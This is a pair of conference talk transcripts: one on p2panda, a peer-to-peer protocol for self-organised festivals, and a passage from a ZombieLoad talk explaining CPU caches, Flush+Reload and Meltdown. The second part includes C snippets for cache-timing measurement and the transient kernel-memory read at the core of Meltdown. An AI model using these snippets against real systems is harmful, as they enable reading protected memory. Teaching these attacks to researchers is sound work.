And at this moment, we think that a request authorization process can help. And to illustrate that, I'll show you some UI examples we already thought of. So p2panda, first of all, could have a replication health state, so you can understand how well connected you are right now with others. Or it could also have a confirmation state of requested resources. And this is to indicate how far the event has progressed in its appropriations. If I want more resources for my event, I request it like so. And the other user can accept or reject my request. We think that we will initially implement the first come first served policy, where the user authorizes requests of resources as they come in, or the system does it in an automatic way. But there are also many other possibilities you can think of, like you can let the system decide randomly. And there are also many, many other more possibilities which you can do with p2panda. And now Vincent will tell you about those and the adventures and dreams and future dreams of p2panda. Hello. Yes, so Sophie told us about the implementation and if you are a technical person, you might now imagine what the software could look like. But if you look at these building blocks that Sophie described, like the clients, resources and festivals, these could be really a lot of different things. And so I want to give some examples, sometimes also referencing some of the memories that Andreas told you about in the beginning, to open up these concepts and let you dream about what else these could be. So let's start with the clients. A client, as you are probably imagining it right now, is something like an app or a website that you go to look at the Fahrplan, the schedule of events, or to make your own event in the festival. But as the protocol offers just a data stream, a client could be a lot of other things. A client can transform data to present or preserve it in alternative ways. For example, in this conference, we are lucky to be able to look at recordings and memories from past C3 conferences. But that is not the case for a lot of other events, and it would be nice to go back a couple of years later and look at what happened. This is actually one very strong argument, I think, for peer-to-peer. It allows you to own your data again. So you have visited this event, and now the data is on your computer. You can keep it. Nobody can take it offline. Another example is that clients can also be part of the festival itself. You have all of this data available, and you can use it creatively to create installations or other apps like the wonderful c3nav app here. And because we have a unified data model that offers these resources and users, all of these apps can reference each other, and it would be easier to make them compatible with each other. And I think this is really one of the crucial ideas of what this is about. If you think about what is the difference between something like C3, where we are, or an event like the Fusion Festival, and other events where you have a small group of organizers that create something that is then consumed by a lot of other people, it's that these festivals or events opened up and allowed visitors, the people that come here, to transcend this passive role of just consuming and instead bring themselves into the event. And now you walk through these spaces here and you see all of the beautiful things that people have brought here. And what this does is it enables a sense of community. 
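Going back to the request flow Sophie described, where a resource can be needed by more than one event at the same time and the initial policy is first come, first served, a small sketch of what such a check could look like. The data structures here are illustrative assumptions, not the final protocol:

```python
def request_resource(bookings, resource, event, start, end):
    """Grant a resource to an event unless an earlier accepted booking overlaps
    in time (first come, first served); otherwise reject the request."""
    for b in bookings:
        if b["resource"] == resource and start < b["end"] and end > b["start"]:
            return {"status": "rejected", "conflicts_with": b["event"]}
    booking = {"resource": resource, "event": event, "start": start, "end": end}
    bookings.append(booking)
    return {"status": "accepted", **booking}

bookings = []
print(request_resource(bookings, "choir", "Sportpark concert", 18, 20))   # accepted
print(request_resource(bookings, "choir", "basement noise set", 19, 22))  # rejected, overlaps
```

Back to the sense of community this enables: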
You're not just going to somebody else's place and looking at what they did, but you can bring yourself into it and make it part of yourself. So some other examples of clients. Andreas already spoke about the random meeting idea, and in that case it was part of the Hoffnung 3000 software. But if you have an open protocol like p2panda, everybody can make something like a random meeting bot. Bots could also provide data that can be used by other bots, by processing historical data or remixing data. And now if you go from clients to what are the things that you do there, you request resources in order to make sessions, make events, make workshops. In the end, Sophie shortly mentioned the possibility of, I think you mentioned, random authorization. So there could be lots of different authorization kinds. And these could enable completely different uses also. So if you use this software as a group, you could have majority auth, where access to resources is only granted when a majority of the group says, yes, this is okay. You could have random auth. You could have video auth, where you only get access to technical equipment once you have watched an instructional video. Or game auth: you need to beat the high score if you want to write something on my electric box. So lots of possibilities and ways to be creative with this without asking for permission, because anybody can extend this. Now if you go to resources, what is a resource? It can be anything you bring to the venue. And we saw some great examples from what Andreas talked about. It could be cables, a teddy bear, a printer. It could also be access to a printer or a skill. Like if you're a mime performer, I could maybe request you to assist me in this presentation and illustrate what I'm talking about. Also, I heard that mimes are close friends of pandas. So lots of possibilities. Really interesting idea: a money resource. So you could have something like a 50 euro resource, and then you say, hey, I want to make this workshop, but I need some stuff. And then you use majority auth to let the group decide whether you can use this money to do this. It could be that you need to promote your event and you get access to the homepage and the top spot in order to make your event really visible. Or maybe this is a virtual festival and the resource is just a 3D coordinate in virtual space. So now these are the things that are happening within the event, within the festival. But what is a festival? What is this? It's just a gathering of people. And of course, this is like such a basic thing that is everywhere where humans are. We always gather. And I think we can be very creative with this, if we use software to create new kinds of getting together. So for example, we could have squad conferences. You're going to some conference and you notice there's people that are interested in something and you want to get them together, but there's no space in the conference itself. Use p2panda to make your own squad conference. It could be a conference where you don't know what you're talking about before. Or it could be a permanent festival. Like if you have a hackerspace or a Vereinshaus, you can use p2panda to give access to the resources there to everyone without having a start and end. So p2panda is about providing decentralized infrastructure for self-organized events. And as you see now, we have tried to make this as flexible as possible in order to accommodate lots of different kinds of events. 
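The different kinds of auth listed above can be thought of as interchangeable policy functions that decide whether a request for a resource is granted. A rough sketch; the names and signatures are invented for illustration and are not part of any actual p2panda specification:

```python
import random

def majority_auth(request, votes):
    """Grant only if more than half of the group voted yes."""
    return sum(votes) > len(votes) / 2

def random_auth(request, votes=None):
    """Grant or reject by coin flip."""
    return random.choice([True, False])

def first_come_first_served(request, votes=None):
    """Grant every request that reaches us (time conflicts are handled elsewhere)."""
    return True

# Video auth, game auth and so on would simply be more functions like these.
policies = {
    "majority": majority_auth,
    "random": random_auth,
    "fcfs": first_come_first_served,
}

request = {"resource": "main stage, prime time", "requested_by": "some band"}
print(policies["majority"](request, votes=[True, True, False]))  # True
```

Back to the qualities the team wants to embed in the system itself: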
But also there are some qualities that we want to embed in the system. And we already hinted at this. There's things like radical authorization. There's no admins that are privileged from the beginning. Everybody starts out as just a user, just a client in the system. It's offline first, so we don't bind ourselves to infrastructure and we also don't require being technically able to set up this infrastructure in order to start using p2panda. It's an open protocol, so it can be extended, and Scuttlebutt, Secure Scuttlebutt, also already exists. So there is already other software out there that is based on the same protocol. And this is creating an ecosystem and I think it can be just wonderful. And last but not least, computers have this rigid way where they are very precise and very ordered. But you cannot deny that in this order there's always a little spark of chaos. And yeah, we would like to use this spark to ignite a campfire for us to get cozy and tell stories to each other. Yes, and you can become a p2panda too. We have a GitHub where we have started writing the specification and we will now start implementing. Also, if you're not a technical person, you can just get in touch with us. There's a chat also linked there. And if you want to use p2panda, we would love to support you in setting it up. And we want to create a festival and we want to invite all of you to work with us to make it happen in 2021. A festival using p2panda organized by the Liebe Chaos Verein. And we will have a call for collectives for all the people that want to contribute something as a group. We will have a call for bots if you're a hacker and you want to program something, build something and play around with the system. You're all invited. And what is this? I think this is the birth of the panda. Let's watch. Oh. Oh. Oh. Thank you. Yeah, thank you very much. Get on stage. Wow. This was cool. Thank you. We have questions. So if you have questions, please line up at the microphones here in the hall and we have a question from the internet. Please. Yes. First question would be: with this ephemeral system, what's its take on deleting data? Was it leaking or deleting? Deleting. Just again, please. Löschen. So first of all, if you download something now and it's on your computer, then it's hard for somebody else to delete it. And this will be the same case here. Of course, it would be very impractical if there was a way to unpublish a resource or cancel an event. Okay. Thanks. Microphone one, please. Thank you for your talk. I have a very practical question. So there's resources. It's great. I can have a book. I can have stuff and all that. But my experience from like having these kind of resources, sometimes they're not used in a way that is good for these resources. How do you handle these kind of things? I mean, you didn't talk about these kind of like, I would say like the ugly details because yeah. Yeah, I think this is something technology can't solve. In a way, you could write it in a description text, like how this resource should be treated. You can, of course, you could have some sort of authorization mechanism which prepares the person to use the resource in a nice way. Like maybe you make this person watch a film for 10 hours and then you can get your book, your favorite book. It's a really important book. But I think most of all it's just the person-to-person interaction. 
So at one point you will meet this person at the festival and we'll hand over the book. I think that's maybe even more crucial than the actual implementation. Or you could handle it the normal way: you get yourself an advocate and then you fight this through. Excuse me. I think I didn't hear it acoustically. Okay, I was just overdoing it a little bit. So then you will do it the traditional way. You will get yourself an advocate and you will fight it through to get redemption for your book that was destroyed. Yeah, probably. So microphone two, please. I think one of the first things that I was thinking about was how this technology could help protests like in Chile and Hong Kong. Because I think this is like exactly what they need, especially when we're talking about decentralized and offline. So my question was, what are your ideas for having an offline infrastructure for p2panda? Yeah, I think these thoughts came up also by other people on the way. I think it's quite, I mean, like we've seen it with similar peer-to-peer software, people went to jail for the Barcelona protests. So it's a sensitive topic, I think, but source code got deleted from GitHub. But generally, so far the Scuttlebutt protocol doesn't provide 100% encryption except for private messages. So there is like things which needed to be considered. I think the Scuttlebutt protocol also already has modules to allow Tor, onion routing. So there's many things which could be interesting to be built into p2panda as well. And I think there can be ways to make this more secure and actually really strong for these people. There's also people working right now on private groups in Scuttlebutt. So it's not only like, there's actually larger groups having very secure communication. So yeah, there can be ways to think about right now. We don't include that in our thinking, but yeah, it's not out. That was not really my question. I get that this is a big concern, privacy and security, but like the infrastructure. How do these devices communicate offline? I've never heard anything about it. One way would be you could do it via Bluetooth when it's very near, field networking. And another way is to have local area networks which are not connected to the internet. Or mesh networks. Good. Microphone 1 then I think. Okay, so first of all, thank you so much for this talk. I've heard about p2panda before of course, but this is the first time I fully understood it. And the first thing that struck me was very similar to what the previous question was in a way. And it's also like, what defines a festival? It could be a demonstration. It could be like a bunch of people gathering around music or dancing or whatever, right? But a resource could also be like, hey, I want to contribute to this section of the code. So in a sense, what I'm hearing is also that the infrastructure that you're building with p2panda is something that could potentially be used to organize around anything, almost like a DAO. Okay. Oh, that's awesome. So, blockchain. Thank you, Zelf. Yeah, I'm just thinking about something because I think that was your question answered because there's something else I would like to say about this. My question, I think I was wondering if you guys have been thinking along those lines. And also, I'd love to hear more on what your thoughts are on that.
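For the "local area network without internet" case mentioned in that answer, about the simplest possible discovery mechanism is a UDP broadcast on the LAN. The following is only a sketch of the idea; the port and message format are made up for this example and are not what Scuttlebutt or p2panda actually use:

```python
import json
import socket

DISCOVERY_PORT = 9876  # arbitrary port chosen only for this example

def announce(public_key: str):
    """Broadcast our identity once on the local network -- no internet needed."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    sock.sendto(json.dumps({"peer": public_key}).encode(), ("255.255.255.255", DISCOVERY_PORT))
    sock.close()

def listen(timeout=5.0):
    """Wait for one announcement from another peer on the same network."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(("", DISCOVERY_PORT))
    sock.settimeout(timeout)
    try:
        data, addr = sock.recvfrom(4096)
        return addr[0], json.loads(data)
    except socket.timeout:
        return None
    finally:
        sock.close()
```

Back to the question about organising around anything: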
One of the things that I've been hearing from people that I've talked to about this project is like, okay, what is the problem that you're trying to solve really? What is the focused problem? And I think this is a thinking that is very common in software engineering. And I think also that you were getting at this, but we think of this more like a playground than a solution for a problem. It's like thinking what other ways could there be to get together and what new things could we do? And of course, it's wonderful if this can be applied to things that are already out there. And I think it's maybe even more interesting to see what other things we could make. Okay, thanks. Microphone 2, please. It was such a beautiful talk and I'm deeply sorry that I have a maybe a little bit depressing question. How do you keep people who fundamentally don't share your values from using p2panda? How do you keep a neo-Nazi group from using p2panda for organizing a neo-Nazi music festival? Or is it a situation where it is a tool and you can use the tool for good or for bad? I mean, that's a very common question and problem in the peer-to-peer space, which is not answered. I think for myself, I can just say, I don't know, I see Nazis on the street. I see them probably on the internet as well. The problem is it's a real problem. I see it anywhere and it definitely also happened in that space and I don't think that any space protects you from that really. But one very practical answer is it's possible to block malicious peers, or peers you just don't want to be replicating your data with. So there can be some sort of social network which trusts each other but also prevents certain groups from being part of it by just blocking these peers. This is how, for example, Scuttlebutt is also doing it right now and I think kind of also the only way right now. I know there's one person in the Scuttlebutt gang doing research on that. It's a PhD, when do you publish it? In March. Where can we read about it? cblgh.org. So that's really interesting research which has to be done, but I think blocking is one way, and probably one way in the long term is to make festivals with p2panda and change our society so that we don't have those problems in the future. So any more questions? Microphone 1, I see. So perhaps before or beyond the Nazi question. How can I say, I have always these provocative questions for anyone who is in tech. How can you imagine apps or whatever that actually foster live communication instead of bringing it down and replacing it through digital communication, and that would be in one sense a constructive critique that I would like to make to you because coming from the arts. Although I'm very seduced by the idea of not curating, I'm very seduced, I'm even more seduced about bringing down authorship, I would say, but anyway I'm very seduced. How can you, I mean it's not very inclusive to have an app like that. I mean it's reserved to the people that can master it. It works well in Berlin but, well, so what would you say to that? Yes, I think you are right that if you create a technological system, yes, you exclude people who might not like or might not be comfortable using it. I think also if you're using a social way of interacting, it could also exclude people who are not comfortable using that. I think the best thing would be to have both. And in this case, what's for me very interesting is that this creates an affordance like the resources that might be in here. 
They might be out there now, but I don't know about that. And just by having it presented to me, I hope that it creates new ideas or thinking outside of the box that wouldn't be there otherwise. And the best thing would be to have a mix of all kinds of interaction and creation processes. Especially if you do it in a physical space, there's always lots of talking to people and just doing things and you don't need to do this with the software always. Good. We have one more question from the internet. Signal Angel, before you get cold. Thanks. Put a coat on. I think the question is a little bit related. How do you plan on tackling abuse and controls on the platform? Are there any concepts for that? Maybe nothing. What I said before about these known problems: the Fediverse, that's another example. There's the same thing with Nazis having their own instances. Frauds. We are right now considering that you have to follow a person before you start replicating the data with them. So there's an opt-in into choosing if you trust someone, if you want to replicate the data with that person, with that peer. So this is one barrier you have to maybe go through first. Did I forget something? Yeah, maybe. Okay, thanks. Microphone one, please. Thank you for your talk. I think it's a really cool project. I was wondering if you have a planned target user group and if you think about threats to them. Because we heard about protest groups and I was wondering what is your idea of, let's say, I work for the police and I make an event or a festival to arrest people. So I think it's a very great project but I was just wondering what is your recommendation for usage or your ideas on where it shouldn't be used or should be used? Yeah, I mean, I don't have a clear answer to that except, and I think maybe, I hope this came through in this talk, it's like technology is not only technology but also the people you are surrounding yourself with and how you communicate it. So this is why we want to work with Scuttlebutt, for example, and not make a blockchain application. There's great people in that industry as well but there's also many people we don't agree with. And also it's a completely different narrative surrounded by it and maybe not voluntarily, maybe these projects are great but still the vibe is there. Scuttlebutt has a vibe which is just fantastic and the police would usually not start looking there because there's this strong community of great people and great energy. And this is not done with technology, this is just people and communities. And I think this also goes a little bit for our work with Blatt 3000. I mean, you've seen it a little bit, we come from an underground noise scene, experimental music scene. This is not the big festivals, this is not a big pop festival. So I think also already this is maybe even more important than the actual part of the software and I think this is always what we think about before we actually build it. So it's like, yeah, who are you identifying with, how do you communicate it? It's maybe different than if we would have started like a software project right from the beginning, would have communicated it just as a software project and then thrown it at artists. That's a different story and I think this is maybe a little bit how you can steer it but of course we don't have full control of that. Thanks. Great. And I think also that in order to really control it in order to really prevent this, we would have to embed mechanisms that we don't want to embed. 
Like we would have to have exactly the authoritarian mechanisms in order to be sure that this never happens. Good. Microphone 2 please. Thank you for this really interesting talk. I would like to shift the conversation back to the artistic perspective. What I find fascinating and what you did is the way in which platform culture converges with platform art or platform based art, which I think we're starting to see more and more now. It seems to me like what you've done is taken this, the construct of a festival, broken it down to its possible components in a modular kind of way and allowed people to kind of like extrapolate that and use it in their own way. But still, and this is not intended as a critique, it's a curiosity, would you say that because of the particular structure of your platform, you see repetitions in the types of festivals that people are creating because they're basically using similar modular units that you've sort of kind of made accessible. Have you standardized the concept of a festival and to what extent? Very good question. Thank you. I think this is a little bit, I think that something we are thinking about so far, our answer to that was build a new platform for every festival. I mean, you see that all of these platforms were built from scratch for each festival. They have a completely different name, they have completely different settings, so it doesn't become that thing of like okay, there's Transmediale, we're going there every year, it's super boring and nothing changes. And it's just like maintained for 20 years and you could have also just started something new from scratch all the time. This is a little bit our philosophy, we want to build new things all the time from scratch also to not fall into this thing of like structuring it too well. And also for the participants who maybe came to both festivals, they could relate to it a little bit in the sense of maybe you get used to the chaos. That's maybe one aesthetic or characteristic of these sort of festivals. There's a certain chaos element some people don't like and I understand them very well. It depends on your mood maybe and how you feel right now. And I think, yeah, but I think these are very important questions one has to, I think, once again, like, look at outside of the technology: how do you announce the festival and to what groups do you announce it. This already shapes the festival a lot. It's not so much the technology and also I once again or maybe actually the first time I'm saying it. I mean, right now there's three developers on stage. I'm an artist as well, a musician, but we also have technical backgrounds. The rest of our association doesn't. I think if you would have put a person here on stage, which is not us, then you would have heard a completely different talk. And this is the good thing. I think this is a really nice thing. Like you, there's many people who actually come to the festivals and they don't use the platform once. They just made or what happened was someone booked a 24 hour slot in the basement and just made a noise festival outside of everything. So these things can happen and they're great. So people start like finding their own paths within it or ignore it completely. One more thing in addition to that: in the Liebe Chaos Verein, which was kind of like an umbrella for these kinds of projects. We also tried to think of this by having a specific chaos officer. 
So this is a person in our Verein whose responsibility is to watch our processes and when things become stable to just bring some chaos, just destroy something. I think that's very important. Okay. Thank you. Microphone one, please. Hi. I have a very practical question. We just started organizing MCH, which will be a hacker camp in the Netherlands in 2021 with about 4000 hackers in an empty grass field. You know what it's like. I'll be coordinating the musical program. Preferably we don't have mainstream bands, but also not so experimental that nobody shows up. So hopefully we will have every subgenre presented on the camp. So how can I use p2panda to mobilize the musical taste of all the participants without giving too much attention to the one who shouts the loudest, but get all the subgenres presented on stage. So could you, for example, organize taste groups or moderate or have a Spotify list and people vote or please help me out with that. So I think that is quite difficult to do if you also give control to everybody else, like you give up control in this sense. I think what you can do is to create some kind of expectation by saying this is the kind of music that we like. But after all, I think that you really have to give up control and see what happens. And it could be that it's not exactly the thing you like, but it could also be really great. So the music people like in general, so that they might organize some p2panda on certain musical genres or something like that. Would that be possible practically? Of course. I mean, this is a very open source thing to say, but you can hack it yourself. We will. This is an interesting thought like how can we embed being able to set expectations as the person who first creates an event or maybe even to give the possibility to the group to communicate expectations to everybody else. Like what kind of mix of music would be nice. Interesting idea. So it doesn't have a voting system? You mean a voting system to do what? Yeah, you get a big list of bands and people can just vote. I mean, this could be something like you could have a band that is requesting access to the main stage at the prime time. And then what kind of authorization mechanism do you use for this? You could have an authorization mechanism that gives everybody who attends the festival the option to weigh in on this question and say, yeah, I don't really want to see them. And if there's a majority, then they go. Okay. That sounds cool. Thank you. So thank you very much again for your talk. And round of applause, please again. Thank you.
Festivals and events are organized by a small group of deciders. But what would Eris do? (chaos!) We will look at some of our experiences with decentralised festivals where every participant can truly participate, reflect on how they influence our way of discussing and producing art and technology and discuss p2panda, an idea of a p2p protocol for (self-)organising resources, places and events, which is based on the SSB protocol. This is a technical, artistic, theoretical reflection on how we use technology to run and experiment with decentralised festivals. VERANTWORTUNG 3000 (2016), HOFFNUNG 3000 (2017) and now p2panda are platforms and protocols to setup groups, festivals, gatherings, events or spaces in a decentralised, self-organised manner which allow us to raise questions on how we organise ourselves in our social, artistic & theoretical communities. In this presentation we want to: Show work and reflection processes of BLATT 3000 and Liebe Chaos Verein e. V. i. G. in Berlin on how technology informs art production and how these systemic "meta"-questions can be made the actual means of art, theory and discussion. Introduce some technical key-concepts of the p2panda protocol and how offline-first, append-only data-types, user authorization through cryptographic keys are interesting for ephemerality, self-organization, non-individuality, decentralization and anonymity in art and theory production. Present fictional ideas for festivals of the future. Talk about pandas.
10.5446/53168 (DOI)
You probably remember the Meltdown attacks in 2018 and it was a pretty big flaw in modern CPUs and the CPUs that came afterwards got fixed. They probably seem to be fixed and the problem Meltdown seems to be solved. Well, Michael, Moritz and Daniel, they will show us that this is not the case. A new attack named Zombie Load is possible and in the following hour we'll learn all about it. Please give a really warm round of applause to Moritz, Michael and Daniel. Thank you for this introduction. Welcome everyone to our talk about the Zombie Load attack. So my name is Michael Schwarz. I'm a postdoc at Graz University of Technology in Austria. So you can find me on Twitter, you can write me an email. I will be here the rest of the Congress anyway. So if you're interested in these topics or anything around that, just come talk to me. We can have a nice discussion. My name is Moritz Lipp. I'm a PhD candidate in the same office as Michael and Daniel. You can also reach me on Twitter, just come and talk to me. Yeah, and my name is Daniel Gruß and I don't know, I don't have to repeat all of this. No, but before we dive into Zombie Load, we will start with some... Wait a second, Moritz, wait a second. I added a last minute slide. You don't know about that. You cannot just add a slide. It's important. I mean, it's right after Christmas, right? And we all remember this. Come on, oh, come on. You're kidding. And last year, last year at CCC, we also had this Christmas-themed talk, right? And now we all hear this still ringing in the ears. And this was a really nice talk, I think, as well. And we presented a lot of new Spectre and Meltdown variants there. Maybe not as dangerous as Zombie Load, but still, I think, interesting. And when we presented this, this was uploaded to YouTube afterwards. And I was running around in a suit at that point and someone wrote, ditch the suit, please. He looks so uncomfortable. And today I have a T-shirt that's much better. And we presented, in this talk, we presented a tree, a tree, a systematization tree. And you can see all the different attack variants here, Spectre-type attacks, Meltdown-type attacks. And yeah, so the question is, how does this all relate to Zombie Load? And to start that, I think we will just present Spectre in a nutshell. Yes. And I think... That's Spectre in a nutshell, yes. Yes. And maybe something more. There was also this song about Spectre. Do you remember this song about Spectre? I think they also had a movie with that title. Yeah. Yeah, this is about the most technical explanation that you will get about Spectre today, because the relation from Spectre to... Oh, come on, Daniel. Zombie Load is not that... We are here to give a technical talk, not some goofing around here. So maybe we need some background first. Okay. Have a really technical talk here, right? So can you explain microarchitecture? I mean, of course I can. I mean, that's really easy. So we all know we have a CPU. And then we have some software that runs on the CPU. That's what we always do. And the software has this ISO. It can use this instruction set architecture like x86. So this application can use all the instructions defined by this instruction set architecture and the CPU execute step. And of course the CPU has to implement this instruction set architecture to actually execute the instruction. This is what we call the microarchitecture. Could be, for example, an Intel Core, Xeon, or some AMD Ryzen, stuff like that. And CPUs are really easy. I learned that in my Bachelor. 
So when you want to execute a program, there are just a few steps that the CPU has to do. So first, it fetches the instruction, it decodes the instruction, it executes the instruction. And then when it's finished executing, it writes back the result. Yes. It's really easy, you see? Yes. But this is a very high level. I think we should go a bit more into details if you're asking for that. So maybe to go a bit more into details, we should look what these boxes actually do. Let's start with the front end. In the front end, we will have some part that decodes the instructions that we send to the CPU. There is already a lot of parallelism in there. And also we have a branch predictor which tells us which micro-ops we should execute next. There's a cache for that. And we have a MUX that combines all of this. And then we have an allocation queue which determines what the next instruction will be and sends that onwards. We also have an instruction cache. Of course, we need to get the instructions from somewhere. And of course, the instruction translation lookaside buffer, the ITLB, is connected to that. This one basically translates addresses from virtual to physical. Yes. The next step would be the execution engine. In the execution engine, we have a scheduler and a reorder buffer. The reorder buffer, although it is called reorder buffer, it actually contains all the micro-ops in order, in exactly the order in which they should be executed. It's called reorder buffer because the scheduler just picks them as soon as they are ready and then schedules them on one of the execution units. For instance, there are some for the ALU. There are some for loading data, some for storing data. And yeah, it just schedules them as soon as possible and then they are executed there. And as soon as they are finished executing, they will be retired from the reorder buffer and that means that they will become architecturally visible to all the software. And if something fails? Yeah. If something fails, if something fails, you mean a CPU exception? For instance, yes. Yes. Then, of course, the exception has to be raised and this happens at retirement. So first, the execution unit finishes the work and then the exception is raised and all the things that the execution unit did are just kicked out, just thrown away. So then we go to the memory subsystem. Of course, if we want to make changes, we don't want to keep them in some internal registers. We want to store them somewhere, maybe load data from somewhere. And for that, we have the load buffer and store buffer. And the load buffer and store buffer, they are then connected to the cache, the L1 data cache and we again have a TLB to translate virtual to physical addresses and the line fill buffer to fill cache lines in the L1. Also for some other purposes, but we will get to that later on. Yes. And caches, I think I also talked about caches. We know about caches. At least we've heard that term. Yes. So we can do that pretty easily. For instance, you have a simple application just accessing variable I twice. The first time, it's not in the cache. So we have a cache miss. So the CPU has to ask the main memory, please give me whatever is stored at this address. The main memory will respond with the value and store it in the cache. So the second time you try to access this variable, it's already in the cache. So it's a cache hit. And this is much faster. So if it's a cache miss, it's slow because we need a DRAM access.
On the other hand, if it's already in the cache, it's fast. And if you have a high resolution timer, you can just measure that by measuring how long it takes to access the address. Can you really do that? Yes. I implemented that. And as we can see, around 60 cycles, if the data is stored in the cache and around 320 cycles, if it's a cache miss and if we have to load it from main memory. Oh, wait, I remember something. So we learned something at the university about these caches and cache hits and misses that we can use that for attacks. So there was this flash and reload attack where we have two applications, an attacker and a victim. We have our cache and we have some shared memory. For example, a shared library like the libc. And if shared memory is in the cache, it's in the cache for all the applications that use it. So if we have, for example, an attacker that flushes it from the cache, it's also flushed for all the other applications from the cache. So here, my cache has like four cache sets here, four parts, and the shared memory is in there. It was used before. So as an attacker, I can simply flush it from the cache. That's not in the cache anymore. It's not cached anymore. Then an attacker can simply wait until the victim is scheduled. If the victim accesses the shared memory, it will, of course, be in the cache again. That happens transparently, as you just explained. And then as an attacker again, when an attacker is scheduled, it can simply access the shared memory and measure the time it takes. And from the time, the attacker can infer whether it's in the cache, if this access is fast, and then the attacker knows that the victim accesses the shared memory. Even if the victim is slow, it was not accessed in the meantime, and it has to be loaded to the cache again. It's really simple. Yes. You paid attention in my lecture, I see. But actually, there are some more details that we might want to show here. So if we look at the cache, how a cache actually works, a cache today works not by just having these cache lines, but it divides these storage locations also into so-called ways. And they group these ways into a cache set. So instead of a cache line, we now have a cache set. And the cache index now determines which cache set it is, and not which cache line. So you have multiple congruent locations for data. The question then is, of course, how do you find the right data if you want to look something up in the cache? And for that, you take the remaining bits. So the lowest bits are the offset, and then we have n bits for the index, and the remaining parts, maybe the physical page number, is used as a tag. And this tag is then used for the comparison. And if one of the tags matches, we can directly return the data. I prefer my simple cache. It's a lot easier. So if we combine the cache attack that Michael showed us with the thing that Daniel told us in the beginning, that exceptions are only handled when an instruction is retired, we can build the Meltdown attack. So let's talk about Meltdown in the beginning, because this is an attack that we built up on. Yes, Moritz, I think for Meltdown, I mean, we already saw Spectre. You had it in this slide. I think there was a song about Meltdown, wasn't there? That's not about the Meltdown attack. No. They sing about Meltdown, and it's clearly related to Meltdown. And this sounds serious, yes. But let's get back to the real attack. 
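Before moving on to Meltdown: the Flush+Reload timing measurement described above can be sketched in a few lines of C. This is only an illustrative sketch for x86-64 with GCC/Clang intrinsics, not the speakers' code; `probe` stands for a byte in memory shared with the victim, the function names are made up, and the roughly 60 vs. 320 cycle numbers from the talk are machine dependent, so the threshold is a free parameter.

```c
#include <stdint.h>
#include <x86intrin.h>   /* _mm_clflush, __rdtscp, _mm_mfence */

/* Time a single memory access in CPU cycles. */
static inline uint64_t time_access(volatile uint8_t *addr)
{
    unsigned int aux;
    uint64_t start, end;

    _mm_mfence();
    start = __rdtscp(&aux);   /* read time stamp counter */
    (void)*addr;              /* the access we want to time */
    end = __rdtscp(&aux);
    _mm_mfence();
    return end - start;
}

/* Returns 1 if the probe address was cached, i.e. the victim touched it
 * since our last flush; then flushes it again for the next round. */
static int flush_and_reload(volatile uint8_t *probe, uint64_t threshold)
{
    uint64_t dt = time_access(probe);   /* reload: fast means it was cached */
    _mm_clflush((void *)probe);         /* flush for the next measurement */
    return dt < threshold;
}
```

In a real attack the flush, the wait for the victim, and the timed reload are simply repeated in a loop, one probe address per cache line of interest.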
So it's really simple, we just access an address we are not allowed to access, which makes an application crash, but we can take care of that. So a page fault exception happens. And what we do now, we use this value that we read, which we illegally read, but it's still executed that way, and encode it in our lookup table in the cache. So here, the value is k. So what we do is, we access the memory location on the left of the user memory where the k is, which means this value is loaded into the cache. And now what we can do is, after we executed this illegal instruction and recovered from the fault, we can just mount the Flash and Reload attack on all possibilities of the alphabet. And at letter k, we will have a cache hit, so we know we read the value k. Yes, this is nice, but this doesn't really explain why this actually works. So let's look at the micro architecture again. The meltdown attack, actually the instruction that performs the meltdown attack is just one instruction, one operation that loads from a kernel address, moves something into a register. That's it. That's the entire meltdown operation. Now we have our value in a register, and now we can do with it whatever we like. We can transmit it through the cache if we like, but we could use any other way. The meltdown attack is this reading from the kernel address that actually ends up in our register under our control. Now this enters the reorder buffer, it will be scheduled on a load data execution unit, and then it will go to the load buffer. In the load buffer, we will have an entry, and this entry has to store approximately something like the physical page number, the virtual page number for the virtual address. The offset, which is the same for virtual and physical pages, lowest 12 bits, something like that, and a register number. If you're familiar with register names like RAX, RBX, RCX, and so on, those are just variable names that are predefined. There's actually a set of 160 registers, and the processor will just pick one of them, independent of your variable name. And then yes, we access the load buffer here, and in the next step, we will do a lookup for this memory location in, oh, sorry, we first have to update the load buffer, of course, we have to get a new register, right, this is the old values, the new values are marked in red, the register number, the offset, and the virtual page number are updated. The virtual page number is not used for the lookup in L1, store buffer in LFB, we only use the lowest 12 bits, the offset here, and then what happens next is we do the lookup in the store buffer, in the L1 data cache, in the LFB, and also in the DTLB we check what is the physical address, we get this from the DTLB. Now in the next step, we would lookup in the DTLB, so what does this entry say, and it says, oh yeah, I have a physical page number, it's present, and it's not user accessible, but the fast path, what the processor expects is always that this is a valid address, and it will in the fast path copy this physical address up here, at the same time realize that this is not good, I shouldn't be doing this, but also, I mean, the virtual address matches, the physical address matches, why wouldn't I return the data to the register? And then the data ends up in the register, that's the meldon attack on a micro architectural level. 
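The cache-encoding step just described, stripped down to its core, looks roughly like the following. It is a sketch, not the original proof of concept: fault suppression (a signal handler or TSX) and the Flush+Reload loop over the 256 pages of the lookup table are left out, and `oracle` is an assumed attacker-allocated array that has been flushed beforehand.

```c
#include <stdint.h>
#include <stddef.h>

#define PAGE 4096

/* covert-channel lookup table, one page per possible byte value,
 * flushed from the cache before the attack round */
extern uint8_t oracle[256 * PAGE];

static void transient_encode(const uint8_t *kernel_addr)
{
    /* This load faults architecturally, but the transiently forwarded
     * value still selects one of the 256 oracle pages before the
     * exception is raised at retirement. */
    uint8_t secret = *kernel_addr;

    /* This access is what Flush+Reload later finds in the cache. */
    *(volatile uint8_t *)&oracle[(size_t)secret * PAGE];
}
```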
